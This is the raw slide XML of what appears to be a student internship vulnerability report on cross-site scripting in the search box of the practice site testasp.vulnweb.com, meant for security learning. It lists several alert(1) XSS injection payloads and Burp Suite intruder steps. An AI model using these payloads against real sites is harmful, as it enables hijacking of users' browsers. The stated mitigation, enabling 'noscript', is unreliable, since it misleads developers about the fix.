            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4412974" y="405516"/>
            <a:ext cx="2560320" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="661864"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VULNERABILITY REPORT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4214B78B-5C6C-4225-AF1A-318E239F445B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723568" y="907353"/>
            <a:ext cx="10029099" cy="4031873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Title          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>: Cross site scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t> Vulnweb.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sub Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t> testasp.vulnweb.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steps to reproduce   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>1. visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testasp.vulnweb.com/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>                                           2.On the top menu you will find a search option.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>                                           3.Click on it and you will prompted with the search box.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> 		   4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> Inject this Javascript code properly into the vulnerable parameter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>                                                                    &lt;img src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/img&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>                                                                    &lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>                                                                    &lt;audio src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/audio&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>                                                                    &lt;video src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/video&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>                                                                    &lt;image src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/image&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>                                                                    &lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E5EA3F1-8DAE-4A56-A62E-3E2AEFEE5AB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="4772" b="5543"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2660138" y="3945466"/>
            <a:ext cx="5436332" cy="2742487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EE76B5E-DA89-4057-9DEF-2D336DFE9E60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8204200" y="4326467"/>
            <a:ext cx="3784599" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The following POC window indicates the vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229990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66BB66-74BA-4452-BD79-536C70BBB630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="660401"/>
            <a:ext cx="11108267" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Impacts        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>          : cross site scripting can lead to stealing of your user data and it can be harmful for  your 			                  website/company</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>		With user interaction, an attacker could execute arbitrary Javascript code in a victim's browser. This 			would allow an attacker to unwillingly make a victim:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Perform any action in the identified endpoint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>View any information that the user is able to view</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Modify any information that the user is able to modify </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82FC1F80-74EB-4643-91F5-3343710890C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745065" y="2709333"/>
            <a:ext cx="10295467" cy="892552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Proof of Concept </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>Screen Shots and video.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>          : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>if u want to prevent your website to be vulnerable of cross site scripting then you c                                                       			an just enable noscript in the report</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304015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55850" y="2855631"/>
            <a:ext cx="467309" cy="1118752"/>
            <a:chOff x="2955850" y="2902286"/>
            <a:chExt cx="467309" cy="1118752"/>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84731" cy="1015663"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"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84731" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>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431380" y="2358131"/>
            <a:ext cx="4853573" cy="1616252"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>THANK YOU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57804FC9-5F2C-416B-909C-77E4E7EAB2E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8802384" y="6298059"/>
            <a:ext cx="3192882" cy="41862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b="0" i="0" kern="1200" spc="300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0" algn="ctr"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600" b="1" i="1" dirty="0"/>
              <a:t>INTERNSHIPSTUDIO.COM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2627177745"/>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759597-1FA4-4F46-9BA8-01240C5602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TASK 2</Template>
  <TotalTime>84</TotalTime>
  <Words>572</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Algerian</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Gill Sans SemiBold</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>REPORT ON VULNERABILITY</vt:lpstr>
      <vt:lpstr>VULNERABILITY SCAN ON :    . http://testasp.vulnweb.com/                                           </vt:lpstr>
      <vt:lpstr>             1. visit http://testasp.vulnweb.com/                                          2.On the top menu you will find a search option.                                          3.Click on it and you will prompted with the search box.                                          4.You can intercept the request in Burp suite.                                          5.Now you can find different payloads for XSS.                                          6.Send the request to intruder and paste all the payloads.                                          7. Try to find a successful payload for XSS.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VULNERABILITY</dc:title>
  <dc:creator>prabhudas avanigadda</dc:creator>
  <cp:lastModifiedBy>prabhudas avanigadda</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-09T13:02:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-09T14:27:19Z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